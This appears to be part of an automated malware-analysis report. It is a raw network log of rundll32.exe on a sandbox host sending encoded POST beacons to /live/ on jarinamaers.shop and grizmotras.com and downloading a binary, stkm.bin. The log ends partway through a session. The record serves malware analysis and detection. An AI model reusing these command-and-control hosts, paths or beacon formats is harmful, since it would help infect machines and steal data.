                                                                                                Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWQ==
2024-04-26 21:17:13 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=swQ5OaFvSHOpF6LjKfOQMxJWFPAjP8YpO4VuRrv3vYQLQ6csJzM0fjj2OdvFTuBHyogzVuaz652Sf4NjaOROL%2Fu3k6LAgOqxtDypJCFt0lyGCtGMXVWL3SMVHJdD3nVHek0z"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a998fd2d18a552-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 21:17:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49748 | 104.21.46.75 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:17:13 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 184
                                                                                                Cache-Control: no-cache
2024-04-26 21:17:13 UTC | 184 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWQ==
2024-04-26 21:17:20 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZsbWzna2ISWo4fyaS%2F2pn4uADEc11mInBrBkc04L6HRnh3DRFCuaglnv%2F7OeAU4cqmK%2BVmr4ZXYmHgNfU%2FKJq8tXflZFn0nYbTZAsKijOM2cTN0reEr9Kc%2FIlBkpE%2BbhMeCl"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999327febd9bd-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 21:17:20 UTC | 198 | IN
                                                                                                Data Ascii: c0QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnGhY1oaAw4inMglY3TEgvBuBUDuIXYg2gxZagDLx
2024-04-26 21:17:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49749 | 104.21.46.75 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:17:20 UTC | 129 | OUT | GET /files/stkm.bin HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
2024-04-26 21:17:21 UTC | 716 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:21 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 857600
                                                                                                Connection: close
                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                Cache-Control: max-age=14400
                                                                                                CF-Cache-Status: EXPIRED
                                                                                                Last-Modified: Fri, 26 Apr 2024 17:35:13 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOetRzzh2BEiqmdkNc3Tcy1e2ZcvP1rHf44m6VeYwM7G3E0XHqgYKSnZHzv0AqCwjrHOpBEzdYJV6MU41nHs09AcXXUWBZzfzqUN0gxGkKFDEfL3fFZ4BrP4HuIacZv%2BAqCk"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9995c3ef025a0-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                27 | 192.168.2.5 | 49750 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:17:24 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:24 UTC | 180 | OUT | Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RvE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:28 UTC | 572 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1neCgo496T532%2FvSRcsH9ULNapYeI3YRsZ8DTsSqy5bt94YDdXTXh3lQ7rXXqA1EyiqQT0Oa4tCZnn38jMYygiVvzzkUyXU1vccQVy0lTKeX5xHfLCJBAtIpwOX3xXlODw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999733e6467e7-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:28 UTC | 118 | IN | Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                28 | 192.168.2.5 | 49751 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:17:28 UTC | 228 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 1116
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:28 UTC | 1116 | OUT | Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 75 45 35 76 63 43 2f 48 57 43 71 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57 44 35 41 76 78 42 68 66 69 30 33 47 79 76 50 62 39 38 61 71 69 2f 39 6c 4f 2b 64 77 73 38 62 6c 68 70 37 77 6a 73 30 6e 37 34 4b 36 6f 2b 36 69 45 4a 4f 62 4c 71 55 43 46 72 71 57 45 35 33 74 46 54 67 51 52 4f 71 75 59 76 66
                                                                                                Data Ascii: YjOeEyiMk3RuE5vcC/HWCqZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuWD5AvxBhfi03GyvPb98aqi/9lO+dws8blhp7wjs0n74K6o+6iEJObLqUCFrqWE53tFTgQROquYvf
                                                                                                2024-04-26 21:17:31 UTC | 572 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dq86jx3AONZO8FTpoNoUTi4bUnSG97KESbgK1R1HWENVJMGY2tvDaDK14mcfCErvdmmyP5gtWp1JJUsC%2FPx0QolA119J0VTKfc0wtZ1rAmaqq57tzIOfk34zLkBHrnr8Ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999908f9d498e-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                29 | 192.168.2.5 | 49752 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:17:31 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:31 UTC | 180 | OUT | Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 74 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RtE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:37 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:37 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mNCnjEzqh9jJBqsHfNliWP75%2BbGFBHHRVl9PjZs83alpGFkR6b3JrY4IMzu4z8kwvkYd2T4y2z73OosLdCBxi0MXw%2FsbwXx%2FDNCAQomcGKGD2y8EqpCbKiaKC27XY1QIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999a0ef1674ca-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:37 UTC | 118 | IN | Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                30 | 192.168.2.5 | 49753 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:17:37 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:37 UTC | 180 | OUT | Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 73 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RsE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:42 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Moto%2FHakBGR9PYwRxxVnnkFJq59rz%2B5X%2FoTTQ2ND9b8%2Bbzjw%2BpZATZ8fXSSpzet5F6RO1u8d04vG0PQwmxHWrB2PU0ze1eMae%2FdqEKwA%2Bc5e0PfnEjLa8IX65KIxX6ZvgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999c7be254c27-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:17:42 UTC | 118 | IN | Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:17:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                31 | 192.168.2.5 | 49754 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:17:43 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:43 UTC | 180 | OUT | Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6a 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 42 76 6b 42 32 37 2b 74 58 54 4c 57 6d 41 55 62 6d 4b 6e 69 35 65 79 64 48 37 36 63 35 34 34 77 33 64 41 35 6d 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d
                                                                                                Data Ascii: YjOeEyiMk3RjE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
                                                                                                2024-04-26 21:17:47 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B7IK5vx%2BJkiGgybszpPe67upNO%2BJGVqpHK3G%2FJl5yT3dvtUIL6c9jlvZUpEe8DMUN%2Fdi%2FOSYucbDp225XY0xvoy8InLXUpJ0SnbD4wNIcTTKIwZOEFU4bFJuFyiU30wAbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a999ea2cd16db9-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                32 | 192.168.2.5 | 49755 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:17:47 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:17:51 UTC | 572 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:51 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2o4enqXMjlTB3y0RGt7VBEDeiXczN4xgoFnnAqp6bGKlptVoNrr9GMfo0wdjZ2jZjKbArSQFi2vvB9igoIbuR6CgzH%2BpsZx66adDoQVRUMS8s49gRtljendbw3JQwfmvPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a057a5d8759-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                33 | 192.168.2.5 | 49756 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:17:51 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 12780
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:01 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpw8s%2F2wz720PZ8%2FIsb5Qln%2BR4u9faMI3NwT1DPjazeK6mj1rLUeSyIi7D2FvJkOYtmYV0zSc3DbMZXfoUE6I6XLIcP3Np8XXeEhcGwHVjGpOFSRpKhJo46M%2BlvHHBsthg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a1cc89e5c69-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                34 | 192.168.2.5 | 49757 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:01 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:05 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDEqxSctneib%2FOFviRJUjtHLz9RjSfEAoKnr5PqT7cIUo7JIX6YFMWkO%2BlQILICUt5qFh7cGCeyBwNGVKBXl45JlxU19Dsq0JU2P3BX7T2%2BADnVma1mOzlC8rcYgfzSCQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a5cddea741d-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                35 | 192.168.2.5 | 49758 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:05 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:13 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BMMJrfgbCMZNCtreyhPYzJBfd1js6JTaJqT7Ml%2FjWIJsmjfxqYAHriodr4HC5GIueHPyRA7xtqBqCaaBaGyrrZsTiSdgoyUFnZwC%2FdQ684Z1taUBV3dxQTM%2FypkMaxwzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99a76a9326db0-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                36 | 192.168.2.5 | 49759 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:13 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
